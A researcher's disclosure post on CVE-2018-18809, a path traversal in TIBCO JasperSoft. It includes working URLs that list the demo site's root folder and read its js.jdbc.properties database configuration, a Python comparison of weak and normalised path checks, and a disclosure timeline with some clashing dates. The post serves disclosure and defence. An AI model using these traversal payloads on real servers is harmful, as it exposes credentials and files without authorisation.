Background

About Tibco JasperSoft... basically I have no idea what it is or why it exists :) Some kind of Business Intelligence solution. Read about it on their website, if needed.

Why I don't know: I "met" this software at the beginning of one pen-test engagement, found the problem described below, reported it to the client, and an immediate decision was made to remove access to it and to drop it from the pen-test scope. No further investigation was made.

CVE-2018-18809 Proof-of-Concept on JasperSoft demo site mobiledemo.jaspersoft.com

The vulnerability is in the reportresource/reportresource/ service, in the resource parameter.

There is a "defence": the value of the resource parameter must start with net/sf/jasperreports/. It is clearly not enough, since traversal sequences after the prefix still pass, but the prefix requirement was probably able to fool scanners.

Preconditions

No authentication or authorisation is required.

Proof-of-concepts on JasperSoft's own demo site, run on 2019-04-21 (vendor notified 2018-10-11, fix published since 2019-03-06).

File listing

Showing the file listing of the application root folder.

http://mobiledemo.jaspersoft.com/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../

[Screenshot: CVE-2018-18809 Tibco JasperSoft path traversal, folder listing]

Reading file

As an example, reading the database configuration file js.jdbc.properties from the application root folder.

http://mobiledemo.jaspersoft.com/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties

[Screenshot: CVE-2018-18809 Tibco JasperSoft path traversal, file reading]
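As an added illustration (not JasperSoft's code, which is Java; this is a Python model of the check), here is the prefix-only validation described above beside one that normalises the path before deciding, run over the two PoC resource values quoted in this post. The third, legitimate-looking resource path is constructed for the example.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Prefix the vulnerable service required (from the post).
REQUIRED_PREFIX = "net/sf/jasperreports/"


def weak_check(resource: str) -> bool:
    """Prefix-only 'defence': accepts anything that merely starts with the prefix."""
    return resource.startswith(REQUIRED_PREFIX)


def hardened_check(resource: str) -> bool:
    """Collapse '.' and '..' first, then require the result to stay under the prefix.

    Assumes the value is already percent-decoded (as parse_qs returns it).
    """
    if resource.startswith("/") or "\\" in resource or "\x00" in resource:
        return False
    normalized = posixpath.normpath(resource)  # "a/b/../../c" -> "c", "x/../.." -> ".."
    root = REQUIRED_PREFIX.rstrip("/")         # normpath drops trailing slashes
    return normalized == root or normalized.startswith(root + "/")


def resource_from_url(url: str) -> str:
    """Extract the (decoded) resource query parameter from a reportresource URL."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("resource", [""])[0]


# The two PoC URLs quoted in the post, plus one constructed legitimate-looking value.
SAMPLES = [
    "http://mobiledemo.jaspersoft.com/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../",
    "http://mobiledemo.jaspersoft.com/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties",
    "http://example.invalid/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/engine/fonts/fonts.xml",  # constructed
]


def compare(url: str) -> tuple:
    """Return (resource, accepted_by_weak_check, accepted_by_hardened_check)."""
    resource = resource_from_url(url)
    return resource, weak_check(resource), hardened_check(resource)


if __name__ == "__main__":
    for url in SAMPLES:
        resource, weak, hard = compare(url)
        print(f"{resource!r}: prefix-only={weak} normalised={hard}")
```

Both PoC values pass the prefix-only check and fail the normalised one, while a resource that legitimately stays under the prefix (including one that uses ".." but ends up back inside it) passes both.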

Critical impact

Impact: an unauthenticated remote attacker can read file listings and file contents from the target site.

In its own TIBCO Security Advisory, Tibco rates the risk at CVSS v3 9.9:

CVSS v3 Base Score: 9.9 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

The only point missing from the maximum is "Privileges Required" with value "Low". Not sure why it wasn't "None".

Suggestion

Follow the "Solution" section of the TIBCO Security Advisory: March 6, 2019 - TIBCO JasperReports Library - 2018-18809.

Vulnerability Disclosure Timeline

Timezone for dates: Tallinn/Europe

  • 2018-10-15 | me > Tibco | Notification to security@tibco.com
  • 2018-10-15 | Tibco > me | Thanks for the PoC

.. 2 weeks of silence ..

  • 2018-10-29 | me > Tibco | How is it going? No fixes, even for their own site.
  • 2018-10-15 | Tibco > me | Explanation of their policy: they treat everyone equally, and as no fix is available for their customers, they cannot fix their own site either.

.. loooooong silence ..

  • 2019-01-11 | Tibco > me | The issue is still under investigation. Discovery credits and coordination of publishing details for the future.
  • 2019-01-11 | me > Tibco | Response, agreement on credits.

.. and a fix is already available ..

.. ok, I'll finally write the Full Disclosure. Went to recheck the Tibco JasperSoft demo site - still vulnerable ..

  • 2019-04-21 | me > Tibco | I'm going to write a Full Disclosure, but your own demo site is still vulnerable.
  • 2019-04-22 | Tibco > me | "Software still vulnerable or demo site still vulnerable?"
  • 2019-04-22 | me > Tibco | I haven't retested the software, but the demo site is still vulnerable.
  • 2019-04-26 | Tibco > me | Demo site is fixed/updated now.

.. ouch, it's 2019-09-07 and what did I find.. an unpublished blog post :)

  • 2019-09-07 | me | Full Disclosure on security.elarlang.eu

Conclusion: I personally really don't share the attitude of keeping one's own environment vulnerable just because no fix is available for clients.

Communication was friendly and professional - no unnecessary emotions or conflicts.
